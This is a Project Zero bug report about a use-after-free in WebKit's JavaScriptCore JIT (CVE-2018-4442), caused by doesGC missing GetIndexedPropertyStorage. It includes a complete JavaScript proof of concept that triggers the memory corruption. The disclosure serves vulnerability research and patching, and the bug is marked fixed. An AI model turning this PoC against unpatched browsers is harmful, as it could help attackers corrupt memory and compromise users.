New issue
Advanced search Search tips
Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Jan 10
Cc:



Sign in to add a comment
link

Issue 1699: WebKit: JSC: JIT: GetIndexedPropertyStorage can GC

Reported by lokihardt@google.com, Oct 16 Project Member

Issue description

The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF.

PoC:
function gc() {
    for (let i = 0; i < 10; i++) {
        new ArrayBuffer(1024 * 1024 * 10);
    }
}

function opt(arr) {
    let r = /a/;
    let o = {};

    arr[0].charAt(0);
    arr[1].charAt(0);
    arr[2].charAt(0);
    arr[3].charAt(0);
    arr[4].charAt(0);
    arr[5].charAt(0);
    arr[6].charAt(0);
    arr[7].charAt(0);
    arr[8].charAt(0);
    arr[8].charAt(0);
    arr[9].charAt(0);

    o.x = 'a'.match(r);

    return o;
}

function main() {
    for (let i = 0; i < 10000; i++) {
        opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);
    }

    let a = 'a'.repeat(1024 * 1024 * 2);
    let b = 'a'.repeat(1024 * 1024 * 2);

    let arr = [];
    for (let i = 0; i < 10; i++) {
        arr[i] = a + b;
    }

    gc();

    let o = opt(arr);

    gc();

    let tmp = [1234];

    print(o.x);  // 1234
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
 

Comment 1 by lokihardt@google.com, Oct 16

Project Member

Comment 2 by lokihardt@google.com, Oct 16

Project Member
Description: Show this description

Comment 3 by lokihardt@google.com, Oct 16

Project Member
Summary: WebKit: JSC: JIT: GetIndexedPropertyStorage can GC (was: WebKit: JSC: JIT: Bugs in doesGC)
The real problem was GetIndexedPropertyStorage.

Comment 4 Deleted

Comment 5 by lokihardt@google.com, Oct 16

Project Member
Description: Show this description

Comment 6 by lokihardt@google.com, Jan 10

Project Member
Status: Fixed (was: New)

Comment 7 by lokihardt@google.com, Jan 16

Project Member
Labels: -Restrict-View-Commit CVE-2018-4442

Sign in to add a comment